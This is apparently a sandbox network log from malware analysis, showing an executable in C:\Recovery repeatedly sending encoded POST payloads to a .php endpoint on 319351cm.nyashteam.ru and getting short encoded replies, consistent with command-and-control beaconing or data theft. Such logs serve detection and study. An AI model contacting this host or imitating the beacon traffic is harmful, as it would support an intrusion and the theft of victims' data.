Dec 6, 2024 03:14:28.319689035 CET	966	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2H5RxjVRzf3VMmx3dUv%2F%2FaaozshIh%2FoHWaesEORY%2Bkjt6KRiMLMJIhf%2BNh3mL0salgfyQPJKB0%2FPYR5Tu8SqVk6sgGa8T15x2%2FrUfJLKZUyUSQZSk5NTQO8hAxxm7Iu7ECx%2BrJS1V54%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c3388f7f4267-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3601&min_rtt=1706&rtt_var=4431&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=1569&delivery_rate=86528&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1e 25 11 27 3e 3f 03 22 54 24 5b 39 3e 27 09 31 2d 39 5f 3a 01 2b 00 35 3b 25 5d 3f 59 2b 0e 24 42 2b 59 29 2f 35 13 28 06 27 54 3e 02 23 5b 00 13 25 07 2a 2d 32 52 3d 2a 3c 5a 31 55 2a 5f 28 26 3e 10 29 3e 20 0f 34 29 2d 15 35 5b 3b 0e 30 03 06 0b 2f 1c 34 14 3c 09 32 51 25 34 21 5e 0e 11 3a 0c 26 33 08 58 21 3b 27 54 31 1e 2c 5a 28 07 33 00 24 06 23 1f 3c 24 0e 53 33 31 00 0e 30 3c 38 1e 25 14 2d 02 34 2f 37 56 2e 06 23 5f 2c 01 2c 52 0d 35 54 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%'>?"T$[9>'1-9_:+5;%]?Y+$B+Y)/5('T>#[%-2R=<Z1U*_(&>)> 4)-5[;0/4<2Q%4!^:&3X!;'T1,Z(3$#<$S310<8%-4/7V.#_,,R5TQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.6	50089	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:27.688312054 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
Dec 6, 2024 03:14:28.045783997 CET	1012	OUT	Data Raw: 56 54 5f 5c 5c 5c 53 59 5c 56 52 5a 50 5e 5a 54 58 5b 5b 59 50 5f 56 5d 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VT_\\\SY\VRZP^ZTX[[YP_V]Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"* :=1;R(4&+9R2<S$>_=.4!?)S&/_"?8']/!Q!0
Dec 6, 2024 03:14:28.774559021 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:29.007745981 CET	806	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n1dQAl2XnWfgtwKieR0I69736mMW22MqOuSoz9aSVBhSB3zLQxG%2BByS06J71Kp2PoN4xtpiMAfVLr2VM8wLXNGadGO6a51KoO%2FGtA60ivRCI8T7yqXU6ws6CNIq6r4j3n8QkgIMeo1Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c33cdd9f8c69-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3372&min_rtt=2167&rtt_var=3223&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=123644&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.6	50090	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:29.261704922 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
Dec 6, 2024 03:14:29.608478069 CET	1012	OUT	Data Raw: 53 52 5f 5e 5c 5f 56 5b 5c 56 52 5a 50 53 5a 5d 58 5a 5b 5f 50 54 56 5d 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SR_^\_V[\VRZPSZ]XZ[_PTV]Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"=%\*"W?&$%21?$$=)=3[7Y21!V,']/!Q!
Dec 6, 2024 03:14:30.383413076 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:30.646032095 CET	818	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v8MEHnPRORj%2FukY5o%2B%2BX0zRC%2Fo7XmfXsOy%2FsdmZtY7jHF5kQy66UVFMbM4aGe6ijWukk0qu%2FOGuYs3SdbrRTyrTcL3OAAszCCl8UPY1ikRoV%2FANbQqVMTkSInkl4ETd18CHn%2Fr1tBUI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c346efad42a7-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3492&min_rtt=2225&rtt_var=3368&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=118113&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.6	50091	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:30.885674000 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:31.232979059 CET	1012	OUT	Data Raw: 53 55 5a 5e 59 5b 56 5f 5c 56 52 5a 50 52 5a 55 58 5d 5b 57 50 5c 56 5c 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SUZ^Y[V_\VRZPRZUX][WP\V\Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!)0>8<7%;5%?#$;"[* #Y6'*+_57;=']/!Q!
Dec 6, 2024 03:14:31.986612082 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:32.219866991 CET	806	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rukhDMcPlNF3AH6Nc8CTiuQXyriYzTodzkHKEFaDaaUw4H26xePxQMLUYSM8ymM9npuTAmp7a3NeyNJoxcZvi803I31R9cGeRJUZKCSspI3wVyV%2FukRsdcPCTo1yq9YZNySAb5eE1XM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c350f9b842bb-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=19972&min_rtt=15717&rtt_var=14404&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=29342&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.6	50092	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:32.493675947 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:32.842318058 CET	1012	OUT	Data Raw: 56 54 5f 5b 59 5d 53 5b 5c 56 52 5a 50 58 5a 50 58 5f 5b 5d 50 5b 56 54 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VT_[Y]S[\VRZPXZPX_[]P[VTZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"@)>/<6'%&2?<0;"Y(>4)T%* 6#;-']/!Q!(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.6	50093	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:33.448458910 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1296 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:33.795489073 CET	1296	OUT	Data Raw: 53 53 5f 51 59 5d 53 5c 5c 56 52 5a 50 5d 5a 5d 58 58 5b 57 50 5c 56 5f 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SS_QY]S\\VRZP]Z]XX[WP\V_Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"E*%=?+6+\1%V%??U0("X(- !/=R%\#";7/']/!Q!
Dec 6, 2024 03:14:34.553003073 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:34.877453089 CET	969	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QNDRR6t20dKENv%2F1QbUa3mr%2B2eQ%2FLEtoIN3Hzw8ykuSivv0iekbN6Ako7n%2F%2BPCKJss%2FjynwEO2JX8hsAfk7kt4dZb0tWv4C%2B932q41fy71tA8HRwmQiJGMEmgPOWU%2FeJIRXUQ1DUKHQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c360fd347d24-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=15634&min_rtt=11351&rtt_var=12823&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1593&delivery_rate=32004&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1e 26 04 24 03 3f 01 22 0c 38 1d 2d 00 01 0c 31 2d 3d 5b 39 2b 2c 16 23 3b 13 59 28 06 34 55 33 0a 0a 07 2a 12 2d 5b 28 3c 2f 1e 2a 38 23 5b 00 13 26 17 3d 3e 39 0e 3d 00 2c 16 25 1d 32 16 3e 0f 3a 12 2a 2e 0d 57 37 5c 31 1b 23 3d 3c 56 30 13 23 53 2f 1b 05 04 3c 09 2d 0a 26 24 21 5e 0e 11 39 55 32 55 2e 5a 21 38 23 1c 27 23 20 10 2b 07 0a 5b 33 01 38 0d 2b 34 20 53 27 31 29 52 27 3c 30 1f 32 03 3d 06 20 06 37 51 2e 16 23 5f 2c 01 2c 52 0d 35 54 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&$?"8-1-=[9+,#;Y(4U3-[(</8#[&=>9=,%2>:*.W7\1#=<V0#S/<-&$!^9U2U.Z!8#'# +[38+4 S'1)R'<02= 7Q.#_,,R5TQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.6	50094	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:33.572516918 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:33.920573950 CET	1012	OUT	Data Raw: 56 55 5f 51 59 59 56 5c 5c 56 52 5a 50 5c 5a 56 58 5c 5b 59 50 5c 56 5a 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VU_QYYV\\VRZP\ZVX\[YP\VZZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!?"R($&6&+U3&>X4/5'*?";R/=']/!Q!8
Dec 6, 2024 03:14:34.672498941 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:34.933765888 CET	821	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gkqSUqZVnxhBo5NZulaO%2F9w%2FqVc%2FH4HWYhEw2Vnek66zQZnYJZT%2BywQhIAAM2cYQk2o3YjtfE5ZE%2B0HU%2FLBMejb0%2BPW8NQpR8PHQOXNtcAL%2B71Clb4wUS%2FPfu4eDgQBzsg%2B2vTkvehg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c361bb748c3f-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4230&min_rtt=1966&rtt_var=5266&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=72701&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.6	50095	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:35.311636925 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:35.670435905 CET	1012	OUT	Data Raw: 56 56 5f 50 59 59 56 5f 5c 56 52 5a 50 53 5a 57 58 5c 5b 57 50 54 56 5c 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VV_PYYV_\VRZPSZWX\[WPTV\Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!>3%\="0?&<2;9S&,($)(-3Z#?!S&?Y!8;.=']/!Q!
Dec 6, 2024 03:14:36.475691080 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:36.770016909 CET	820	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hI8Ygxf0vZVnk7ctS%2F%2BdNYkxDzbWAsAXqZZ%2BAa6pb%2BO2Bp11pFSvZhIkDGzs%2BKrcqPoGtmuEznXNaFKHhhZtgBAOmT11ZrJVDl%2BDwm%2FTvuLuOW1yD1wIHXjbLH6sbx1u4b%2Fg4B9t9Vk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c36d0dcc1a0b-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=48634&min_rtt=44753&rtt_var=19555&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=32623&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.6	50096	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:37.025826931 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
Dec 6, 2024 03:14:37.373631001 CET	1012	OUT	Data Raw: 53 52 5a 59 59 51 56 58 5c 56 52 5a 50 5b 5a 55 58 5a 5b 5a 50 5d 56 54 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SRZYYQVX\VRZP[ZUXZ[ZP]VTZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"=!<+5;[&()W2S0+"Y=,7'93Y!?R/']/!Q!$
Dec 6, 2024 03:14:38.114626884 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:38.360059023 CET	808	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VapnIZt7SNRiphRF1wg2mdfdZAD9JxfzvrA9oPSydB8jGWtvYk%2Fwa1J8JZulSy8yv%2Bn5Vdwr%2FZZdP2%2FBkS3B4oGmBA%2B4cBGmG6TwC0RCEx6%2FmjGBNNwYgrMIRGY5maNWgpNDk58on8M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c3773cb9de98-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3771&min_rtt=1855&rtt_var=4529&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=84942&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a Data Ascii: 42V\U
Dec 6, 2024 03:14:38.552189112 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.6	50097	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:38.793656111 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:39.139208078 CET	1012	OUT	Data Raw: 53 52 5f 51 59 51 53 58 5c 56 52 5a 50 52 5a 54 58 59 5b 5a 50 55 56 5b 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SR_QYQSX\VRZPRZTXY[ZPUV[Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!0&)'T<?1;2Z+U'Y)Y >%*"R8=']/!Q!
Dec 6, 2024 03:14:39.876593113 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.6	50098	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:14:40.011869907 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1296 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:14:40.358077049 CET	1296	OUT	Data Raw: 53 56 5a 5b 59 5c 53 5f 5c 56 52 5a 50 53 5a 54 58 5b 5b 56 50 5c 56 5c 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SVZ[Y\S_\VRZPSZTX[[VP\V\Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"@*:=V>&;'+1/;08.>=#Z7)U20#88']/!Q!
Dec 6, 2024 03:14:41.098005056 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:14:41.365096092 CET	958	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:14:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QMdog%2FrgkzKdVCH3plzljmcSCMgYmw02M5GUnNbdvbcl3c6pfd%2FVOiKP3ch9tM1NC5KXp%2BMYYbE7CJenbKmxe6GZegclWreIDgZ02kR7E3oROkkVcackSsFHoAV5IWxhPG5LoTK%2BTA4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c389e9f042e8-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3577&min_rtt=1743&rtt_var=4322&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1593&delivery_rate=88937&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1e 25 5b 24 2d 34 13 35 0b 34 5a 2e 00 02 51 26 2e 3e 05 2c 38 0e 5e 22 15 39 15 28 3f 3c 1c 27 1a 28 00 29 2c 39 5f 3e 3c 38 09 29 38 23 5b 00 13 26 5e 29 13 26 1a 28 3a 3b 03 27 33 04 5c 3d 36 3e 1f 3e 10 2c 0a 21 2a 3a 00 23 3e 30 1b 24 2d 09 10 38 25 0e 16 28 51 31 0f 26 1e 21 5e 0e 11 39 1d 26 33 32 5e 23 28 2f 51 25 1e 38 58 2b 17 38 13 24 11 28 08 2b 34 27 0a 25 22 36 0f 30 01 0a 1e 27 3a 21 06 20 3c 3f 51 2d 06 23 5f 2c 01 2c 52 0d 35 54 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 